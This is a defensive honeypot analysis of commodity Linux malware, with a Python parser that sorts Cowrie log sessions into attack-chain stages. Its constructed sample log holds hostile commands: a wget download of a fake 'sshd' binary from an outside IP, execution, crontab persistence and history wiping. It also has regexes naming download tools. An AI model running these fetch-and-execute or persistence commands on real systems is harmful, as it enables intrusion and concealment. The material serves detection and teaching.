Static Analysis of Linux Malware Captured by a Cowrie Honeypot
When a bot thinks it has logged into a small energy device, it installs commodity Linux malware. This is a static, defensive breakdown of what a honeypot captured after weak SSH and Telnet logins: fake-daemon binaries that masquerade as sshd and xinetd, a statically linked bot, a backdoor with three independent persistence mechanisms, and a self-deleting campaign visible only through the commands it ran. The payloads are ordinary, but the chain is the lesson: weak login, host fingerprint, payload staging, persistence, and reach-out. A default-deny egress policy breaks the last step.
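As an added, defensive example (not code from the original analysis): a small parser that walks Cowrie JSON log lines and labels each session with the chain stages named above, flags dropped files named after real daemons, and lists the hosts the session reached out to, which is what a default-deny egress policy would block. The log lines are constructed, and the Cowrie field names (eventid, session, input, url, outfile) are assumed to match Cowrie's JSON logger.

```python
import json
import re
from urllib.parse import urlparse

# Constructed Cowrie JSON log lines, not a real capture. Field names
# (eventid, session, input, url, outfile) are assumed to follow Cowrie's JSON logger.
SAMPLE_LOG = """
{"eventid":"cowrie.login.success","session":"s1","src_ip":"198.51.100.7","username":"root","password":"123456"}
{"eventid":"cowrie.command.input","session":"s1","input":"uname -a; cat /proc/cpuinfo | grep name | head -1"}
{"eventid":"cowrie.command.input","session":"s1","input":"cd /tmp; wget http://203.0.113.9/x/sshd; chmod +x sshd"}
{"eventid":"cowrie.session.file_download","session":"s1","url":"http://203.0.113.9/x/sshd","outfile":"/tmp/sshd"}
{"eventid":"cowrie.command.input","session":"s1","input":"echo '@reboot /tmp/sshd' | crontab -"}
{"eventid":"cowrie.command.input","session":"s1","input":"./sshd; rm -f sshd; history -c"}
"""

# One regex per stage of the chain; each is matched against a shell command line.
STAGE_PATTERNS = {
    "fingerprint": re.compile(r"\buname\b|\bnproc\b|\blscpu\b|/proc/cpuinfo|/etc/issue"),
    "staging": re.compile(r"\b(wget|curl|tftp|ftpget)\b"),
    "persistence": re.compile(r"crontab|/etc/rc\.local|/etc/init\.d|systemctl enable|\.bashrc"),
    "self_delete": re.compile(r"\brm\s+-\S*f\S*\s|\bhistory -c\b"),
}
# Dropped files named after real daemons: the masquerade the analysis describes.
MASQUERADE_NAMES = {"sshd", "xinetd"}

def classify_command(cmd):
    """Return the set of chain stages a single shell command line matches."""
    return {stage for stage, rx in STAGE_PATTERNS.items() if rx.search(cmd)}

def reconstruct_chain(log_text):
    """Map each Cowrie session to the ordered chain stages seen and the hosts it reached out to."""
    sessions = {}
    for line in filter(None, map(str.strip, log_text.splitlines())):
        ev = json.loads(line)
        s = sessions.setdefault(ev["session"], {"stages": [], "egress_hosts": []})
        eid = ev.get("eventid")
        if eid == "cowrie.login.success":
            s["stages"].append("weak_login")
        elif eid == "cowrie.command.input":
            for stage in sorted(classify_command(ev.get("input", ""))):
                if stage not in s["stages"]:
                    s["stages"].append(stage)
        elif eid == "cowrie.session.file_download":
            # The download is the reach-out; default-deny egress would block this host.
            s["egress_hosts"].append(urlparse(ev.get("url", "")).hostname)
            if ev.get("outfile", "").rsplit("/", 1)[-1] in MASQUERADE_NAMES:
                s["stages"].append("masquerade")
    return sessions

if __name__ == "__main__":
    for sid, info in reconstruct_chain(SAMPLE_LOG).items():
        print(sid, " -> ".join(info["stages"]), "| egress:", info["egress_hosts"])
```

Feeding a real cowrie.json through reconstruct_chain gives, per session, the same stage ordering the text walks through and a list of egress hosts to check against the firewall policy.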